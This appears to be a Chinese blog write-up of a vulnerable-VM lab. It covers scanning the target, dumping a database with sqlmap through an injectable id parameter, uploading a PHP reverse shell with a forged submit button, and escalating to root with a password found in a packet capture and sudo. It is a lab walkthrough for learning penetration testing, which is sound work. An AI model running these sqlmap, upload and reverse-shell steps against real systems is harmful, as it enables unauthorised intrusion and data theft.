一、信息收集
1、查看靶机的mac地址:
2、扫描靶机的ip地址:
nmap 192.168.13.0/24
3、扫描靶机开放的端口:
nmap -p- 192.168.13.147
4、访问靶机的80端口:
5、页面没有什么功能点,进行目录扫描查看是否有有用信息:
6、经过拼接访问,发现有一个页面可以访问:
页面上面有一些问题,猜测这个页面的作用就是回答问题,经过回答问题得到一串二进制的数字:0110111001
7、数字可能是一个目录,尝试拼接数字进行访问:
接着页面会重定向一个新页面:
8、对网站进行目录扫描:
dirsearch -u "192.168.13.147/nt4stopc/0110111001/summertimesummertime/"
9、拼接访问查看是否有有效信息:
在这个页面找到两个登录框:
但是没有账号密码和数据库连接信息
10、检查页面的功能点,发现点击页面右下角新闻时url会出现参数:
11、参数可能存在sql注入,尝试进行测试:
python sqlmap.py -u "http://192.168.13.147/nt4stopc/0110111001/summertimesummertime/go.php?id=3" --batch
12、经过查看,只有tatil数据库下的表可以利用:
python sqlmap.py -u "http://192.168.13.147/nt4stopc/0110111001/summertimesummertime/go.php?id=3" --batch -D tatil --tables
13、查看字段下的表,发现有一个文件和一个加密的值:
python sqlmap.py -u "http://192.168.13.147/nt4stopc/0110111001/summertimesummertime/go.php?id=3" --batch -D tatil -T gereksiz --dump
14、解密得到:
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas可能是一个目录
15、访问网站:
http://192.168.13.147/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php
16、发现是一个文件上传功能点,但是没有提交按钮,需要我们构造一个:
<input name=’up’ type=’submit’>
17、在页面源代码中显示文件以MD5命名:
18、在kali制作一个反弹shell文件:
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php
vim php-reverse-shell.php
将ip和端口修改为kali的ip和要监听的端口
19、上传木马文件:
成功上传!提示说以osas尾数,MD5值命名
20、修改文件:
echo -n "php-reverse-shell.php" | md5sum
21、kali开启监听:
nc -lvvp 4444
22、上传文件:
23、上传成功,访问上传的文件,成功反弹shell:
24、查看反弹用户的权限,权限不高:
二、提权
1、查看/var/www/html文件,发现有一个流量包:
2、将文件下载下来:
http://192.168.13.147/important.pcapng
3、使用wireshark打开流量包进行查看:
发现在email处有ssh密码通过url解码得到:mklpc-osas112.
4、使用密码进行ssh连接:
5、命令发现,这个用户虽然是普通用户,但是sudo有全部的权限,可以sudo进行提权:
6、sudo su提权:
1888
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
